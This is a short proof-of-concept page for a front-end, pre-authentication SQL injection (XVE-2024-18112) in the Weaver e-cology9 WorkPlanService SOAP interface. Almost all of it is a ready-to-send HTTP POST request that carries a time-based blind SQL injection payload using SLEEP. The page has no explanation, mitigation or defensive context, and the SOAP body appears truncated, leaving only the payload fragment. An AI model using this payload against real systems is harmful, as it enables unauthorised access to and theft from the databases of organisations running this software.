# 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112) ## poc ```yaml POST /services/WorkPlanService HTTP/1.1 Content-Length: 430 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 SOAPAction: Content-Type: text/xml;charset=UTF-8 Host: 192.168.52.168 Referer: http://192.168.52.168:80/services/WorkPlanService Cookie: ecology_JSessionid=aaawzto5mqug94J9Fz0cz Connection: close (SELECT 8544 FROM (SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo) 22 ```